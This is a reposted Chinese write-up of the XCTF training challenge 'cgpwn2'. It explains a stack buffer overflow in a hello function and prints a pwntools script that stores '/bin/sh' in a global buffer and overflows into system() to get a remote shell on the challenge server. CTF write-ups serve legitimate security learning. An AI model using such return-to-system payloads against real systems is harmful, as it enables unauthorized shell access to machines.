相關內容簡體繁體

攻防世界—pwn—cgpwn2

本文轉載自查看原文 2020-04-10 09:29 700 CTF

題目分析

題目提示

checksec檢查文件保護機制

使用ida查看偽代碼

hello函數存在溢出，與level2類似

信息收集

system地址

name的地址

編寫腳本

from pwn import *
p = remote('111.198.29.45',42844)
#p = process("./pwn006")
binsh = "/bin/sh"
system = 0x8048420
name = 0x804A080
payload = "A"*0x26+"B"*0x4+p32(system)+p32(0)+p32(name)
p.sendlineafter("please tell me your name",binsh)
p.sendlineafter("hello,you can leave some message here:",payload)
p.interactive()

本地測試

靶機測試

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 攻防世界PWN題 string 攻防世界pwn-Mary_Morton 攻防世界pwn之新手練習區 WriteUp-adworld(攻防世界)-pwn新手區-level3 攻防世界--神奇的Modbus 攻防世界-web：FlatScience 攻防世界 MISC 進階攻防世界FlatScience 攻防世界-shrine 攻防世界 - Misc（一）

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM